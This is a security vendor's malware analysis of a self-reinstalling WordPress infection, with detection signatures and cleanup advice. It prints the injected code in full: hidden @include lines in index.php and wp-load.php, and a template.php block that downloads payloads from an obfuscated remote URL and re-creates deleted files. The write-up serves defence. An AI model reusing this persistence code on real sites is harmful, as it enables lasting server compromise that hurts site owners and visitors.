WordPress Hidden Include

Today we found previously undetected malware that keeps itself hidden and tries to download itself again if it is deleted.

We generated signatures to detect these hidden includes:

/index.php: {HEX}Malware.Expert.wordpress.hidden.include.0.UNOFFICIAL FOUND
/wp-load.php: {HEX}Malware.Expert.wordpress.hidden.include.1.UNOFFICIAL FOUND
/wp-includes/template.php: {HEX}Malware.Expert.malware.url.7od.info.0.UNOFFICIAL FOUND
/wp-includes/Requests/IPconfig.ini: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND
/wp-includes/js/utilities.js: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND

WordPress

index.php

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */@include( dirname( __FILE__ ) . '/wp-includes/js/utilities.js' );
// Analyst note: the statement glued onto the docblock terminator above is the injected part;
// the header text itself matches the stock WordPress index.php. Placing the include directly
// after "*/" keeps it off its own line, so it is easy to miss when skimming the file.
// "@" suppresses the warning PHP would emit if the target were missing, and include executes
// any PHP inside the target regardless of its ".js" extension, so extension-based scans of
// "*.php" only will not see the payload.

/**

wp-load.php

End of file:

}
        // Analyst note: the two lines below are the injected tail of wp-load.php. The comment that
        // follows is part of the sample (a decoy discouraging edits), not WordPress code. The include
        // pulls in a file with an ".ini" extension from wp-includes/Requests/; include runs any PHP
        // it contains, and "@" hides the warning if the file has been removed.
        // Network host configuration. Not recommended edit this code!
                @include ( ABSPATH . WPINC . '/Requests/IPconfig.ini' );

template.php

// Analyst note: this fragment was found injected into wp-includes/template.php and is the
// persistence ("self-healing") stage: each time it executes it re-creates or overwrites the other
// infected files. Presumably it runs on every request that loads template.php - confirm on the host.
// Cleanup implication: deleting any single artifact is undone on the next execution, so this block,
// the two injected includes and both payload files have to be removed together, and the core files
// then compared against a known-good WordPress copy.
//
// error_reporting(0) silences every warning the code below could raise.
// The download base URL is stored reversed so a plain-text search for the domain does not match;
// strrev() yields hxxp://7od[.]info/sserpdrow/ (defanged). Outbound requests from the web server
// to that host are a usable network indicator.
error_reporting(0); $wp_support = strrev ( '/wordpress/ofni.do7//:ptth' );

// index.php missing (path is relative to the current working directory): fetch "<base>index"
// and write it as index.php. The curl result is written without any check.
if ( is_file ( './index.php' ) == false ) {
	$wp_up_data = curl_init ( $wp_support.'index' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( './index.php' ); file_put_contents ( './index.php', $wp_ip_data ); }

// index.php present: only a size of exactly 499 or 500 bytes is accepted. Any other size - which
// includes a restored copy of a different length - is deleted and replaced by the remote version.
if ( is_file ( './index.php' ) ) {
	if ( filesize ( './index.php' ) <= 498 OR filesize ( './index.php' ) >= 501 ) {
		$wp_up_data = curl_init ( $wp_support.'index' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( './index.php' ); file_put_contents ( './index.php', $wp_ip_data ); }
}

// wp-includes/js/utilities.js missing (the file index.php includes): fetch "<base>utilities" and write it.
if ( is_file ( ABSPATH . WPINC . '/js/utilities.js' ) == false ) {
	$wp_up_data = curl_init ( $wp_support.'utilities' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/js/utilities.js' ); file_put_contents ( ABSPATH . WPINC . '/js/utilities.js', $wp_ip_data ); }

// utilities.js present: kept only when its size is strictly between 77100 and 88100 bytes;
// otherwise it is deleted and downloaded again. Emptying or truncating the file therefore
// does not neutralise it while this block is still in place.
if ( is_file ( ABSPATH . WPINC . '/js/utilities.js' ) ) {
	if ( filesize ( ABSPATH . WPINC . '/js/utilities.js' ) <= 77100 OR filesize ( ABSPATH . WPINC . '/js/utilities.js' ) >= 88100 ) {
		$wp_up_data = curl_init ( $wp_support.'utilities' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/js/utilities.js' ); file_put_contents ( ABSPATH . WPINC . '/js/utilities.js', $wp_ip_data ); }
// The next line closes the utilities.js check and opens a guard that wraps everything up to the
// final closing brace: the IPconfig.ini and wp-load.php steps run only while
// ./wp-content/uploads/slideshow/cache.ini does not exist.
// NOTE(review): the purpose of cache.ini is not visible in this sample - possibly a marker file; confirm.
} if ( is_file ( './wp-content/uploads/slideshow/cache.ini' ) == false ) {

// wp-includes/Requests/IPconfig.ini missing (the file wp-load.php includes): fetch "<base>ipconfig" and write it.
if ( is_file ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) == false ) {
	$wp_up_data = curl_init ( $wp_support.'ipconfig' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ); file_put_contents ( ABSPATH . WPINC . '/Requests/IPconfig.ini', $wp_ip_data ); }

// IPconfig.ini present: same size window as utilities.js (strictly between 77100 and 88100 bytes),
// otherwise it is replaced.
if ( is_file ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) ) {
	if ( filesize ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) <= 77100 OR filesize ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) >= 88100 ) {
		$wp_up_data = curl_init ( $wp_support.'ipconfig' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ); file_put_contents ( ABSPATH . WPINC . '/Requests/IPconfig.ini', $wp_ip_data ); }
}

// wp-load.php is not replaced: when the string "IPconfig.ini" is not found in it, the downloaded
// "<base>wpload" content is appended (FILE_APPEND), which restores the injected include at the
// end of the file after a cleanup that removed only that line.
if ( stripos ( file_get_contents ( './wp-load.php' ), 'IPconfig.ini' ) == false ) {
	$wp_up_data = curl_init ( $wp_support.'wpload' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); file_put_contents ( './wp-load.php', $wp_ip_data, FILE_APPEND ); }
}

IPconfig.ini

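Remove the file. Remove the injected code from template.php at the same time; otherwise that code downloads IPconfig.ini again.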

utilities.js

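Remove the file. Remove the injected code from template.php at the same time; otherwise that code downloads utilities.js again.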

Final Words

Use Malware Expert – Signatures to detect this malware in your files for FREE!